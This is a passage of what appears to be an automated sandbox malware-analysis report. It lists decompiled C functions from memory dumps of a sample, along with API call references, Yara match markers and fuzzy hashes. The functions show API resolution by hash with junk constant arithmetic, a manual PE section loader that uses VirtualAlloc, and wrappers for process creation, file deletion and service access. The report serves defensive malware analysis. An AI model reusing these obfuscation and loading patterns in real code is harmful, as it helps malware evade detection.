                                                      					_t7 = _t55 + 0x28; // 0x28
                                                      					_t77 = _t7 + _t31;
                                                      					do {
                                                      						_t56 =  *_t77;
                                                      						if(_t56 != 0) {
                                                      							if(_a8 < _t77[1] + _t56) {
                                                      								SetLastError(0xd);
                                                      								goto L17;
                                                      							} else {
                                                      								_t38 = VirtualAlloc( *((intOrPtr*)(_t77 - 4)) + _t68, _t56, 0x1000, 4); // executed
                                                      								if(_t38 == 0) {
                                                      									goto L17;
                                                      								} else {
                                                      									_t66 =  *_t77;
                                                      									_t51 =  *((intOrPtr*)(_t77 - 4)) + _t68;
                                                      									_t70 = _t77[1] + _a4;
                                                      									if(_t66 != 0) {
                                                      										_t49 = _t51;
                                                      										_t75 = _t70 - _t51;
                                                      										do {
                                                      											 *_t49 =  *((intOrPtr*)(_t75 + _t49));
                                                      											_t49 = _t49 + 1;
                                                      											_t66 = _t66 - 1;
                                                      										} while (_t66 != 0);
                                                      									}
                                                      									 *(_t77 - 8) = _t51;
                                                      									goto L13;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t54 =  *(_a12 + 0x38);
                                                      							if(_t54 <= 0) {
                                                      								goto L14;
                                                      							} else {
                                                      								_push(4);
                                                      								_push(0x1000);
                                                      								_push(_t54);
                                                      								_push( *((intOrPtr*)(_t77 - 4)) + _t68);
                                                      								if( *_t65() == 0) {
                                                      									L17:
                                                      									return 0;
                                                      								} else {
                                                      									_t72 =  *((intOrPtr*)(_t77 - 4)) + _v8;
                                                      									 *(_t77 - 8) = _t72;
                                                      									if(_t54 != 0) {
                                                      										_t58 = _t54;
                                                      										_t59 = _t58 >> 2;
                                                      										memset(_t72 + _t59, memset(_t72, 0, _t59 << 2), (_t58 & 0x00000003) << 0);
                                                      										_t78 = _t78 + 0x18;
                                                      									}
                                                      									L13:
                                                      									_t68 = _v8;
                                                      									_t65 = VirtualAlloc;
                                                      									goto L14;
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L18;
                                                      						L14:
                                                      						_t53 = _v12 + 1;
                                                      						_t77 =  &(_t77[0xa]);
                                                      						_v12 = _t53;
                                                      					} while (_t53 < ( *( *_a16 + 6) & 0x0000ffff));
                                                      					goto L15;
                                                      				}
                                                      				L18:
                                                      			}
























                                                      0x100016ed
                                                      0x100016f5
                                                      0x100016fa
                                                      0x100016fd
                                                      0x10001700
                                                      0x00000000
                                                      0x10001656
                                                      0x00000000

                                                      APIs
                                                      • VirtualAlloc.KERNELBASE(?,00000000,00001000,00000004,00000000,00000000,100013CB), ref: 100016BB
                                                      • SetLastError.KERNEL32(0000000D,00000000,00000000,100013CB), ref: 10001718
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: AllocErrorLastVirtual
                                                      • String ID:
                                                      • API String ID: 497505419-0
                                                      • Opcode ID: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
                                                      • Instruction ID: fad9ae3e34d1be210c33c3a39cf181ee10ee9e26815f97c4518dfa0af5a2346d
                                                      • Opcode Fuzzy Hash: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
                                                      • Instruction Fuzzy Hash: C3318F757002459BEB10CF59DC80B9AF7E5EF88380F298569E948DB349D672EC51CB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 21%
                                                      			E0024976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t34;
                                                      				int _t39;
                                                      				struct _PROCESS_INFORMATION* _t48;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_t48 = __edx;
                                                      				_push(0);
                                                      				_push(_a68);
                                                      				_push(0);
                                                      				_push(_a60);
                                                      				_push(_a56);
                                                      				_push(_a52);
                                                      				_push(0);
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t34);
                                                      				_v12 = 0xaff9;
                                                      				_v12 = _v12 | 0xcee54bd1;
                                                      				_v12 = _v12 + 0x6ed6;
                                                      				_v12 = _v12 ^ 0xcee61221;
                                                      				_v8 = 0x6229;
                                                      				_v8 = _v8 ^ 0x42aa9f31;
                                                      				_v8 = _v8 >> 2;
                                                      				_v8 = _v8 ^ 0x10aad83f;
                                                      				E002407A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                                      				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                                      				return _t39;
                                                      			}









                                                      APIs
                                                      • CreateProcessW.KERNEL32(0023591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0023591A), ref: 00249816
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction ID: 8aaaab428069adbc48d01d1842b8f6c1b76137c32856cc0d43b623e32781480e
                                                      • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                                      • Instruction Fuzzy Hash: E911B372911148BBDF199FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 31%
                                                      			E0023B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t32;
                                                      				void* _t38;
                                                      				long _t47;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a48);
                                                      				_t47 = __edx;
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(_a36);
                                                      				_push(_a32);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(0);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(0);
                                                      				E0023602B(_t32);
                                                      				_v8 = 0xfd14;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 * 0x7a;
                                                      				_v8 = _v8 >> 9;
                                                      				_v8 = _v8 ^ 0x00002bef;
                                                      				_v12 = 0x4f26;
                                                      				_v12 = _v12 | 0xe7e97f76;
                                                      				_v12 = _v12 ^ 0xe7e94dbb;
                                                      				E002407A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                                      				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                                      				return _t38;
                                                      			}









                                                      APIs
                                                      • CreateFileW.KERNELBASE(00240668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00240668,?,?,?,?), ref: 0023B5FD
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction ID: ae4d34fd2688908d7b37844e0c7cd486ab6290dc1b62701abbb9e3509a401dc7
                                                      • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                                      • Instruction Fuzzy Hash: E911C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A60EB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E0024981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      				void* _t28;
                                                      				void* _t34;
                                                      				long _t37;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a16);
                                                      				_t34 = __edx;
                                                      				_t37 = __ecx;
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t22);
                                                      				_v12 = 0xe68;
                                                      				_v12 = _v12 * 0x39;
                                                      				_v12 = _v12 ^ 0xd1b1d871;
                                                      				_v12 = _v12 ^ 0xd1b2fb7e;
                                                      				_v8 = 0x629e;
                                                      				_v8 = _v8 + 0xfffff5da;
                                                      				_v8 = _v8 | 0xbef7b77b;
                                                      				_v8 = _v8 ^ 0xbef79fc3;
                                                      				E002407A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                                      				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                                      				return _t28;
                                                      			}










                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002387F2,0000CAAE,0000510C,AD82F196), ref: 0024989B
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction ID: 5c104816d0916b2f742d7da5e2f5af63a7c104f2388a3feb003ea95f8739dd8b
                                                      • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                                      • Instruction Fuzzy Hash: 78015A76801208FBDB08EFD5DC46CDFBF79EF85750F108199F918A6220E6715B619BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00247BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				int _t31;
                                                      				signed int _t33;
                                                      				struct _SHFILEOPSTRUCTW* _t40;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_t40 = __ecx;
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0023602B(_t24);
                                                      				_v8 = 0xa117;
                                                      				_t33 = 0x76;
                                                      				_v8 = _v8 / _t33;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 ^ 0x210fe703;
                                                      				_v8 = _v8 ^ 0x210fdcea;
                                                      				_v12 = 0xf1e9;
                                                      				_v12 = _v12 << 9;
                                                      				_v12 = _v12 ^ 0x01e3a445;
                                                      				E002407A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                                      				_t31 = SHFileOperationW(_t40); // executed
                                                      				return _t31;
                                                      			}










                                                      APIs
                                                      • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00247C67
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileOperation
                                                      • String ID:
                                                      • API String ID: 3080627654-0
                                                      • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction ID: 770df398bab2141a37eb02192e8c8783d3f149e98fc0c61528bafcf87d895afb
                                                      • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                                      • Instruction Fuzzy Hash: 0A014FB190120CFFEB09DF94C84A8DEBBB9EF44314F108198F50567240E6B15F609B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 52%
                                                      			E0023F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t24;
                                                      				void* _t29;
                                                      				int _t35;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a20);
                                                      				_t35 = __ecx;
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0023602B(_t24);
                                                      				_v12 = 0xd5a7;
                                                      				_v12 = _v12 ^ 0x994cba9d;
                                                      				_v12 = _v12 ^ 0x994c19d3;
                                                      				_v8 = 0xac88;
                                                      				_v8 = _v8 << 3;
                                                      				_v8 = _v8 >> 8;
                                                      				_v8 = _v8 + 0xebed;
                                                      				_v8 = _v8 ^ 0x0000ab82;
                                                      				E002407A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                                      				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                                      				return _t29;
                                                      			}









                                                      APIs
                                                      • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0023F6D8
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: OpenService
                                                      • String ID:
                                                      • API String ID: 3098006287-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E0023B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t23;
                                                      				intOrPtr* _t27;
                                                      				void* _t28;
                                                      
                                                      				E0023602B(_t23);
                                                      				_v12 = 0x9431;
                                                      				_v12 = _v12 >> 7;
                                                      				_v12 = _v12 ^ 0x0000160f;
                                                      				_v8 = 0xc972;
                                                      				_v8 = _v8 ^ 0x829e0126;
                                                      				_v8 = _v8 + 0x4512;
                                                      				_v8 = _v8 + 0xffff18f9;
                                                      				_v8 = _v8 ^ 0x829e24c1;
                                                      				_t27 = E002407A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                                      				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                                      				return _t28;
                                                      			}









                                                      APIs
                                                      • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0023B759
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleInformation
                                                      • String ID:
                                                      • API String ID: 3935143524-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E0024AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0023602B(_t21);
                                                      				_v12 = 0xcc49;
                                                      				_v12 = _v12 << 6;
                                                      				_v12 = _v12 >> 2;
                                                      				_v12 = _v12 ^ 0x000ca988;
                                                      				_v8 = 0x5d85;
                                                      				_v8 = _v8 | 0xb9d19a55;
                                                      				_v8 = _v8 * 0xd;
                                                      				_v8 = _v8 ^ 0x6fa87272;
                                                      				E002407A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                                      				_t27 = DeleteFileW(_a12); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0024AAA8
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 25%
                                                      			E1000745A() {
                                                      				void* _t1;
                                                      				void* _t2;
                                                      				void* _t3;
                                                      				void* _t4;
                                                      				void* _t7;
                                                      
                                                      				_push(1);
                                                      				_push(0);
                                                      				_push(0); // executed
                                                      				_t1 = E10007592(_t2, _t3, _t4, _t7); // executed
                                                      				return _t1;
                                                      			}









                                                      APIs
                                                      • _doexit.LIBCMT ref: 10007460
                                                        • Part of subcall function 10007592: __lock.LIBCMT ref: 100075A0
                                                        • Part of subcall function 10007592: DecodePointer.KERNEL32(10010D48,0000001C,10007509,1000E4A0,00000001,00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D), ref: 100075DF
                                                        • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100075F0
                                                        • Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007609
                                                        • Part of subcall function 10007592: DecodePointer.KERNEL32(-00000004,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007619
                                                        • Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 1000761F
                                                        • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007635
                                                        • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007640
                                                        • Part of subcall function 10007592: __initterm.LIBCMT ref: 10007668
                                                        • Part of subcall function 10007592: __initterm.LIBCMT ref: 10007679
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                                      • String ID:
                                                      • API String ID: 3712619029-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      C-Code - Quality: 92%
                                                      			E00239FDC(void* __edx) {
                                                      				void* __edi;
                                                      				signed int _t751;
                                                      				void* _t787;
                                                      				signed char** _t788;
                                                      				signed char** _t790;
                                                      				signed char** _t793;
                                                      				signed char** _t799;
                                                      				short _t803;
                                                      				signed int _t804;
                                                      				signed int _t805;
                                                      				void* _t806;
                                                      				signed int _t809;
                                                      				signed int _t817;
                                                      				signed int _t820;
                                                      				signed int _t832;
                                                      				signed int _t836;
                                                      				signed int _t903;
                                                      				intOrPtr* _t917;
                                                      				short* _t918;
                                                      				short* _t919;
                                                      				signed int _t920;
                                                      				signed int _t921;
                                                      				signed int _t922;
                                                      				signed int _t923;
                                                      				signed int _t924;
                                                      				signed int _t925;
                                                      				signed int _t926;
                                                      				signed int _t927;
                                                      				signed int _t928;
                                                      				signed int _t929;
                                                      				signed int _t930;
                                                      				signed int _t931;
                                                      				signed int _t932;
                                                      				signed int _t933;
                                                      				signed int _t934;
                                                      				signed int _t935;
                                                      				signed int _t936;
                                                      				signed int _t937;
                                                      				signed int _t945;
                                                      				signed int _t946;
                                                      				signed int _t948;
                                                      				void* _t949;
                                                      				void* _t950;
                                                      				void* _t951;
                                                      				void* _t954;
                                                      				void* _t955;
                                                      
                                                      				_push( *((intOrPtr*)(_t949 + 0xc84)));
                                                      				_t917 =  *((intOrPtr*)(_t949 + 0xc7c));
                                                      				_push( *((intOrPtr*)(_t949 + 0xc84)));
                                                      				_push( *((intOrPtr*)(_t949 + 0xc84)));
                                                      				_push(_t917);
                                                      				_push( *((intOrPtr*)(_t949 + 0xc84)));
                                                      				_push(__edx);
                                                      				_push(1);
                                                      				E0023602B(1);
                                                      				 *((intOrPtr*)(_t949 + 0x17c)) = 0x6a586e;
                                                      				_t950 = _t949 + 0x1c;
                                                      				 *((intOrPtr*)(_t950 + 0x164)) = 0x4d85c8;
                                                      				_t946 = 0;
                                                      				 *(_t950 + 0x16c) =  *(_t950 + 0x16c) & 0;
                                                      				 *((intOrPtr*)(_t950 + 0x168)) = 0x46238e;
                                                      				_t806 = 0x2ca20b85;
                                                      				 *(_t950 + 0x9c) = 0xada2;
                                                      				 *(_t950 + 0x9c) =  *(_t950 + 0x9c) + 0xd9a3;
                                                      				_t920 = 0x73;
                                                      				 *(_t950 + 0xa0) =  *(_t950 + 0x9c) / _t920;
                                                      				 *(_t950 + 0xa0) =  *(_t950 + 0xa0) ^ 0x0000429d;
                                                      				 *(_t950 + 0x98) = 0x829e;
                                                      				_t921 = 0x5b;
                                                      				 *(_t950 + 0x98) =  *(_t950 + 0x98) / _t921;
                                                      				 *(_t950 + 0x98) =  *(_t950 + 0x98) | 0x5cf90483;
                                                      				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x5cf976e6;
                                                      				 *(_t950 + 0x7c) = 0xdccb;
                                                      				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) | 0xedfbfbdf;
                                                      				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0xedfbcdea;
                                                      				 *(_t950 + 0xb4) = 0xef7d;
                                                      				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0xffff7351;
                                                      				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0x45;
                                                      				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0000234d;
                                                      				 *(_t950 + 0xe8) = 0xccb1;
                                                      				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) + 0x3b3d;
                                                      				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x0001006d;
                                                      				 *(_t950 + 0x74) = 0xc511;
                                                      				 *(_t950 + 0x74) =  *(_t950 + 0x74) >> 4;
                                                      				_t922 = 0x69;
                                                      				 *(_t950 + 0x74) =  *(_t950 + 0x74) / _t922;
                                                      				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0x0000383c;
                                                      				 *(_t950 + 0xa4) = 0x943d;
                                                      				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xad44;
                                                      				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) >> 2;
                                                      				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00004163;
                                                      				 *(_t950 + 0x114) = 0x676a;
                                                      				_t923 = 0xb;
                                                      				 *(_t950 + 0x130) = 0;
                                                      				 *(_t950 + 0x110) =  *(_t950 + 0x114) / _t923;
                                                      				 *(_t950 + 0x110) =  *(_t950 + 0x110) ^ 0x00005b51;
                                                      				 *(_t950 + 0x4c) = 0x9f6f;
                                                      				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) << 0xe;
                                                      				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) + 0x7984;
                                                      				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) | 0x0af96bf2;
                                                      				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) ^ 0x2ffd6a7e;
                                                      				 *(_t950 + 0x44) = 0xfa80;
                                                      				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 6;
                                                      				 *(_t950 + 0x44) =  *(_t950 + 0x44) * 0x6e;
                                                      				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 1;
                                                      				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x35d1b322;
                                                      				 *(_t950 + 0xec) = 0x5cda;
                                                      				 *(_t950 + 0xec) =  *(_t950 + 0xec) << 5;
                                                      				 *(_t950 + 0xec) =  *(_t950 + 0xec) ^ 0x000ba47c;
                                                      				 *(_t950 + 0x2c) = 0x6ba5;
                                                      				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 1;
                                                      				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) >> 1;
                                                      				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 0xe;
                                                      				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) ^ 0x1ae9281a;
                                                      				 *(_t950 + 0xb4) = 0xc1db;
                                                      				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 0xa;
                                                      				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 9;
                                                      				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0ed84dc8;
                                                      				 *(_t950 + 0xf0) = 0xa853;
                                                      				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) + 0x8705;
                                                      				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) ^ 0x00017aa3;
                                                      				 *(_t950 + 0xe8) = 0x787f;
                                                      				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) >> 3;
                                                      				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x00000848;
                                                      				 *(_t950 + 0xa8) = 0xf94e;
                                                      				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) | 0x6bab1057;
                                                      				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) >> 3;
                                                      				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) ^ 0x0d7537b0;
                                                      				 *(_t950 + 0x118) = 0x6b15;
                                                      				 *(_t950 + 0x118) =  *(_t950 + 0x118) + 0xcaa9;
                                                      				 *(_t950 + 0x118) =  *(_t950 + 0x118) ^ 0x0001740a;
                                                      				 *(_t950 + 0x10c) = 0x9660;
                                                      				_t804 = 0x3f;
                                                      				_t924 = 0x1c;
                                                      				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) * 0xe;
                                                      				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) ^ 0x00084bb7;
                                                      				 *(_t950 + 0x8c) = 0x9ebc;
                                                      				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) >> 8;
                                                      				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) << 7;
                                                      				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) ^ 0x00000420;
                                                      				 *(_t950 + 0x124) = 0x986;
                                                      				 *(_t950 + 0x124) =  *(_t950 + 0x124) * 0x7d;
                                                      				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x0004cea0;
                                                      				 *(_t950 + 0x84) = 0x3532;
                                                      				 *(_t950 + 0x84) =  *(_t950 + 0x84) / _t804;
                                                      				 *(_t950 + 0x84) =  *(_t950 + 0x84) | 0x9ebb0f6f;
                                                      				 *(_t950 + 0x84) =  *(_t950 + 0x84) ^ 0x9ebb511f;
                                                      				 *(_t950 + 0xa4) = 0x41f;
